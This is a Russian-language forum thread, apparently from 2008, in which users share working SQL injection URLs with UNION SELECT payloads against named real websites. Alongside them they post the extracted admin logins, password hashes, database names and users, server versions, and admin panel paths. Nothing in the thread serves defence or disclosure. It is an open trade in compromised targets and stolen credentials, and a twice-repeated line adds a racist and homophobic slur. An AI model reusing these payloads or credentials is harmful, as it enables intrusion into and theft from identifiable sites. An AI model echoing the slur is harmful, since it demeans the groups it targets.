http://www.pc-olymp.ru/gymnastik/index.php3?page=-1+union+select+concat(login,0x3a3a,pwd),2,3,4+from +users+limit+0,10/*
Жесть! login: admin Password: admin - ЛОЛ! ЛОЛ! ЛОЛ! Админа в жертву неграм-гомосексуалистим!!!!
Cennarios
09.08.2008, 20:53
http://www.pc-olymp.ru/admin/ - стандартно
Cennarios
09.08.2008, 21:30
http://www.gorobzor.ru/articles/view?id=1+union+select+concat(username,0x3a3a,user _password,0x3a3a)+from+forum.users+limit+1,10/*
Login Goodman
Pass: $H$9j04UOE51YElZky1aSdrq8t8ekKETZ/
Черти, потрудились бы грамотно фреймворк изучить...
Heavy Metal
09.08.2008, 21:33
www.accuratelimited.com
http://www.accuratelimited.com/entry_detail.php?entry_id=-1+union+select+1,2,3,concat_ws(0x3a,id,user_login, user_pass)+from+wp_users&entry_type=insight
www.airquality.co.uk
http://www.airquality.co.uk/archive/laqm/laqm.php?action=submit&map_name=wmid&la_id=-1+union+select+concat_ws(0x3a,user,password),2,3,4 +from+mysql.user
www.hanwha.com.twhttp://www.hanwha.com.tw/hardware_detail.php?hard_id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase()),6,7,8,9,10,11,12,13,14,15
Жесть! login: admin Password: admin - ЛОЛ! ЛОЛ! ЛОЛ! Админа в жертву неграм-гомосексуалистим!!!!
Автор строк, почему бы не объеденить сообщения в одно, а не постить по 15 раз подряд? ;)
http://www.i-veikals.lv/?lapa=prod&group=1+union+select+1,2/*&lang=lv
http://www.i-veikals.lv/?lapa=prod&group=1+union+select+1,database()/*&lang=lv
http://www.i-veikals.lv/lapa=prod&group=1+union+select+1,table_name/**/from/**/
information_schema.tables/*&lang=lv
VERSION: 5.0.22
USER: new@hosting.lathost.net
DATABASE: pplhlv_proj
http://www.belarus.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/*
http://www.belarus.kz/index.php?p=1+union+select+1,database(),3,4,5,6,7/*
http://www.belarus.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/**/from/**/news/*
VERSION:4.1.22
USER:brlarusbase@localhost
DATABASE:belarusbase
Cennarios
09.08.2008, 21:43
Дык походу дела как ломал - так и постил)
http://junior.eurovision-georgia.ge/index.php?lang=eng&topid=3&id=-1+union+select+1,2,3,4,5/*
http://imi.ge/index.php?page=movie&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,4,5,6/*
http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,4,5,6/*
http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,concat_ws(0x3a,username,pass, admin),5,6+from+moh_auth+limit+0,10/*
http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,column_name,5,6+from+informat ion_schema.columns+where+table_name=0x6d6f685f6175 7468+limit+3,10/*
moh:de8d1369b56cd8193ee55d4a8532184c:1
http://www.molhsa.ge/phpmyadmin/
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,table_name,4,5,6+from+informat ion_schema.tables--
user: presa_ge@localhost
dbname: presa_ge
version: 5.0.51
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,concat_ws(0x3a,id,user_usernam e,user_password,user_group),4,5,6+from+users+--
44:presa.ge:c1ab283404b71a940807009023a764bd:1
P.S.
Админку найти не могу..
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot